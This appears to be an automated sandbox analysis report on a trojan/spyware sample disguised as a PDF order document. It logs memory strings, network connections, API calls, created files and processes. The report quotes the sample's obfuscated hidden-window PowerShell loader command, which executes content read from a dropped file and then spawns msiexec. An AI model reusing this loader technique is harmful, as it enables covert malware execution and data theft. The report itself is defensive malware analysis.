Source: msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: msiexec.exe, 00000006.00000002.2957521886.000000002117A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.2957521886.00000000212E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.2957521886.00000000212F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405339

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Order requirements CIF Greece_pdf.exe
Source: initial sample Static PE information: Filename: Order requirements CIF Greece_pdf.exe
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403325
Creates files inside the system directory
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe File created: C:\Windows\Superpraised Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe File created: C:\Windows\Superpraised\haanlatterens Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe File created: C:\Windows\resources\0809 Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe File created: C:\Windows\SysWOW64\narrowness.ini Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04FDE260 1_2_04FDE260
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_00ED5061 6_2_00ED5061
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_00ED2240 6_2_00ED2240
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_00ED4DC0 6_2_00ED4DC0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_00ED3530 6_2_00ED3530
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_00EDBEB1 6_2_00EDBEB1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7C147 6_2_20F7C147
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7D278 6_2_20F7D278
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F75369 6_2_20F75369
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7C468 6_2_20F7C468
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7C738 6_2_20F7C738
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7E988 6_2_20F7E988
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7CA08 6_2_20F7CA08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7CCD8 6_2_20F7CCD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F73E13 6_2_20F73E13
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7CFAB 6_2_20F7CFAB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F77118 6_2_20F77118
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F739CD 6_2_20F739CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F73AA1 6_2_20F73AA1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EBB20 6_2_236EBB20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EA6E8 6_2_236EA6E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EAD40 6_2_236EAD40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EF9F0 6_2_236EF9F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E5B69 6_2_236E5B69
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E5B78 6_2_236E5B78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E8748 6_2_236E8748
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E2758 6_2_236E2758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E5720 6_2_236E5720
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EE320 6_2_236EE320
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E2300 6_2_236E2300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E571F 6_2_236E571F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EBB1B 6_2_236EBB1B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EE310 6_2_236EE310
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E8FF8 6_2_236E8FF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E5FCF 6_2_236E5FCF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E5FD0 6_2_236E5FD0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E8BA0 6_2_236E8BA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EE7A1 6_2_236EE7A1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E2BB0 6_2_236E2BB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EE7B0 6_2_236EE7B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E4E6F 6_2_236E4E6F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EDE7F 6_2_236EDE7F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E4E70 6_2_236E4E70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E7A40 6_2_236E7A40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E1A50 6_2_236E1A50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E9E3A 6_2_236E9E3A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E9E38 6_2_236E9E38
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E4A18 6_2_236E4A18
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E4A17 6_2_236E4A17
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E22F9 6_2_236E22F9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E82F0 6_2_236E82F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E52C8 6_2_236E52C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E52C7 6_2_236E52C7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EA6D9 6_2_236EA6D9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E1EA8 6_2_236E1EA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E1E98 6_2_236E1E98
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E7E98 6_2_236E7E98
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EA292 6_2_236EA292
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EA290 6_2_236EA290
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EDE90 6_2_236EDE90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E4168 6_2_236E4168
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E4167 6_2_236E4167
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EF560 6_2_236EF560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E0D48 6_2_236E0D48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E0D47 6_2_236E0D47
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EF55B 6_2_236EF55B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EAD37 6_2_236EAD37
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E3D0F 6_2_236E3D0F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E3D10 6_2_236E3D10
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E15E8 6_2_236E15E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E75E8 6_2_236E75E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E99E2 6_2_236E99E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E99E0 6_2_236E99E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E15F8 6_2_236E15F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E45C0 6_2_236E45C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EF9DF 6_2_236EF9DF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E11A0 6_2_236E11A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E45BF 6_2_236E45BF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E9588 6_2_236E9588
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E119F 6_2_236E119F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E7192 6_2_236E7192
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E7190 6_2_236E7190
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E3460 6_2_236E3460
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E0040 6_2_236E0040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EEC40 6_2_236EEC40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E6428 6_2_236E6428
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EEC33 6_2_236EEC33
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E3008 6_2_236E3008
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E0006 6_2_236E0006
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E08E1 6_2_236E08E1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E08F0 6_2_236E08F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EF0C0 6_2_236EF0C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EF0D0 6_2_236EF0D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236ED0A8 6_2_236ED0A8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E38B8 6_2_236E38B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E0498 6_2_236E0498
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236ED098 6_2_236ED098
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236E0497 6_2_236E0497
PE / OLE file has an invalid certificate
Source: Order requirements CIF Greece_pdf.exe Static PE information: invalid certificate
Uses 32bit PE files
Source: Order requirements CIF Greece_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/13@5/5
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403325
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004045EA
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar, 0_2_0040216B
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe File created: C:\Users\user\AppData\Roaming\skittaget Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe File created: C:\Users\user\AppData\Local\Temp\nso3C58.tmp Jump to behavior
Source: Order requirements CIF Greece_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Order requirements CIF Greece_pdf.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe File read: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) " Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
